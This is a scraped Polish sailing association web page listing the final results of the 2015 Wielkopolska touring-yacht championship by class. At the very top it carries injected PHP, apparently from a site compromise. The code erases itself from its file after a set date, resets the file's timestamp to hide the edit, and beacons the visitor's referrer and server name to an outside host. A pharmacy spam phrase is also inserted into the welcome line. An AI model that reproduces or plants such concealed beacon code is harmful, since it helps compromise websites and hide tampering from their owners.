check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Klasyfikacja Jachtów Turystycznych 2015

Witamy na update cialis professional 100 mg stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home Klasyfikacja Jachtów Turystycznych Klasyfikacja Jachtów Turystycznych 2015

Wyniki regat 2015

MISTRZOSTWA WOJ. WIELKOP. JACHTÓW TURUSTYCZNYCH

04-05.07.2015

Kl. T - 1

Wyniki końcowe

m-ce

typ jachtu

nr/ nazwa

Sternik

Załoga

Klub

pkt

1

Bez-4

BN

Karol Tomaszewski

Grzegorz Juniczak

Posnania

1

2

Orion

Blask Oriona

Rbert Unruh

Jacek Janczak

Wagabunda

2

3

Corvetta

Zorro

Grzegorz Wawrzyniak

Tomasz Herwart

JKW

3

4

Spark 550

PZ 103

Rafał Zakrzewski

Elżbieta Wiercińska, Przemysław Wierciński

JKW

4

Kl.   T - 3

1

Sasanka 620

PO 441

Jerzy Wojtera

Zentner

JKW

1

2

Maxus 28

Bella

Artur Hullin

Jerzy Borkowski, Beata Dobicka

Posnania

2

3

Tango 780

Leon

Karol Krakowski

Wiktor Krakowski, Leon Krakowski

Posnania

4

Kl.   TR

1

Delphia 24

Pol 9

Piotr Kowalewski

Rafał Trzciński, Jerzy Dowański, Aleksander Kowalewski

JKW

1

2

Delphia 24

Pol 33

Maciej Jankowski

Karol Bąk, Piotr Misiąk, Jan Trzciński

JKW

2

3

Delphia 24

Pol 16

Wojciech Bronka

Piotr Mielcarek, Wiktor Mielcarek, Jakub Kryszczyński

JKW

3

4

 

Kołobrzeg

Józef Kozikowski

Ryszard Polaczyk, Władysław Kowdej, Donat Kujawiński, Maja Popłonyk

AZS

4

5

CB66

BN

Roman Czajkowski

Agnieszka Wawrzyniak, Jacek Sławicz

Posnania

5

Kl.   Omega turystyczna

1

Omega

11

Waldemar Knasiecki

Krzysztof Sulejewski

ŻLKS

1

2

Omega

PO 146

Adam Marcinkowski

Dariusz Fabiś, Maciej Zalewski

PKM LOK

2

3

Omega

UKZ Środa

Patryk Różański

Wioletta Szmania, Maciej Wejgelmann

UKŻ Środa

3

4

Omega

PO 1449

Jarosław Klimczyk

Marek Berkau

PKM LOK

4

5

Omega

Pol 263

Mariusz Skowroński

Dariusz Żeberski

PKM LOK

5

Poznań, dnia 05.07.2015.

S.G. Regat

Józef Mikulski